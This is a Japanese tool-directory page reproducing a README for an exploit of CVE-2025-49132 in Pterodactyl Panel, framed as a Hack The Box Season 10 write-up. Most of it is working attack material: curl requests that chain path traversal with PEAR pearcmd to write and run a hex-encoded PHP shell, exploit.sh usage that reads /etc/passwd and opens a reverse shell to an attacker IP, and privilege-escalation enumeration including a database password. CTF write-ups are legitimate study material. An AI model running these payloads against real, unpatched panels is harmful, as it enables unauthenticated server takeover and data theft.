Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-49132_HTB_SEASON10 — CVE-2025-49132 を標的とする Pterodactyl Panel のエクスプロイトで、パストラバーサルと PEAR コマンドインジェクションを組み合わせ、認証なしでのリモートコード実行を可能にします。コマンド実行、リバースシェル、権限昇格のガイダンスのための bash および Python スクリプトが含まれています。 | Kitploit
ツール/GitHubGitHub/nik123-py/cve-2025-49132_htb_season10
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHubnik123-py/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-49132 を標的とする Pterodactyl Panel のエクスプロイトで、パストラバーサルと PEAR コマンドインジェクションを組み合わせ、認証なしでのリモートコード実行を可能にします。コマンド実行、リバースシェル、権限昇格のガイダンスのための bash および Python スクリプトが含まれています。

リポジトリを見る
1167ヶ月前未レビュー

CVE-2025-49132 - Pterodactyl Panel RCE エクスプロイト

HTB Season 10 - Pterodactyl マシンの writeup

概要

ターゲット: Pterodactyl HTB マシン (中程度の難易度)
CVE: CVE-2025-49132
深刻度: Critical (CVSS 9.8)
攻撃タイプ: 認証なしリモートコード実行
影響を受けるバージョン: Pterodactyl Panel < v1.11.11

このエクスプロイトチェーンは以下を組み合わせます:

  1. パストラバーサル (ロケール翻訳システム)
  2. PEAR コマンドインジェクション (pearcmd.php 経由)
  3. PHP コード実行 (ファイル書き込み + インクルードによる)

バグの詳細

Pterodactyl Panel の /locales/locale.json エンドポイントは、locale パラメータを通じてパストラバーサルを許可します:

GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

これは PEAR の pearcmd.php と組み合わせることで:

  1. 任意の PHP ファイルを /tmp に書き込む
  2. 別のリクエストで実行する

なぜ機能するのか

PEAR (PHP Extension and Application Repository) には CLI ツール (pearcmd.php) があり、次の特徴があります:

  • URL パラメータ経由でコマンドを受け付ける (CLI 専用の設計)
  • ファイルを書き込む config-create コマンドがある
  • Web 経由で呼び出された場合、認証がない

エクスプロイトチェーン:

パストラバーサル → pearcmd.php の読み込み → config-create 経由で PHP を注入 → 悪意のある PHP を実行

Hex2bin() のトリック

コマンドは hex2bin() を使用して 16 進数エンコードされ、以下をバイパスします:

  • URL エンコーディングの問題
  • 特殊文字フィルター
  • Nginx/PHP のパース問題

例:

Command: whoami
Hex:     77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>

リモートコード実行

方法 1: 提供された exploit.sh を使用

chmod +x exploit.sh

# Get user flag
./exploit.sh flag

# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# Reverse shell
nc -lvnp 4444  # On attacker machine
./exploit.sh shell 10.10.14.21 4444

方法 2: 手動エクスプロイト

# Step 1: Write PHP shell (hex-encoded "whoami")
curl -g "http://panel.pterodactyl.htb/locales/locale.json?\
+config-create+/&\
locale=../../../../../../usr/share/php/PEAR&\
namespace=pearcmd&\
/<?=system(hex2bin('77686f616d69'))?>+/tmp/shell.php"

# Step 2: Execute
curl "http://panel.pterodactyl.htb/locales/locale.json?\
locale=../../../../../tmp&\
namespace=shell"

方法 3: Python スクリプト

exploit.py を追加しました
**requests をインストール**

🛠️ 提供ツール

1. exploit.sh (推奨)

フル機能の bash エクスプロイト

./exploit.sh cmd "whoami"           # Execute single command
./exploit.sh shell 10.10.14.21 4444 # Reverse shell
./exploit.sh flag                   # Find user flag

機能:

  • 信頼性のための Hex2bin() エンコーディング
  • Python ベースの出力フィルタリング
  • 複数のシェル手法 (bash TCP + mkfifo)
  • クリーンでパースされた出力

2. CVE-2025-49132_DETAILED.txt

包括的な技術ドキュメント

以下を含む:

  • 脆弱性の詳細分析
  • PEAR アーキテクチャの説明
  • ステップバイステップのエクスプロイト分解
  • トラブルシューティングガイド
  • 検出方法 (IOC)
  • 緩和策

クイックスタート

# 1. Add to /etc/hosts
echo "10.10.x.x pterodactyl.htb panel.pterodactyl.htb" | sudo tee -a /etc/hosts

# 2. Download exploit
wget https://your-repo/exploit.sh
chmod +x exploit.sh

# 3. Get shell
nc -lvnp 4444  # Terminal 1
./exploit.sh shell 10.10.14.21 4444  # Terminal 2

# 4. Get user flag
cat /home/phileasfogg3/user.txt

権限昇格

列挙

# Check running services
ss -tlnp

# Found:
# 127.0.0.1:3306 - MySQL (root)
# 127.0.0.1:6379 - Redis
# 127.0.0.1:9000 - PHP-FPM (root)
# 127.0.0.1:25   - Postfix

# Check sudo
sudo -l
# (Likely requires password)

# SUID binaries
find / -perm -4000 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

一般的な権限昇格ベクトル

  1. 既知の認証情報を持つ MySQL
mysql -u pterodactyl -pPteraPanel
# Check for UDF injection, file write perms
  1. root で実行されている PHP-FPM
# Check for FPM exploitation (CVE-2019-11043 or config abuse)
  1. Redis のエクスプロイト
# Check for auth bypass, RCE via cron
redis-cli -h 127.0.0.1
  1. cron 内の書き込み可能なスクリプトを確認
find /etc/cron* -writable 2>/dev/null
  1. カーネルエクスプロイト (最終手段)
uname -a
# Check for DirtyCow, etc.

参考文献

CVE & Exploits

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

技術リソース

  • Pterodactyl Panel ドキュメント
  • PEAR ドキュメント
  • OWASP パストラバーサル

ツールをダウンロード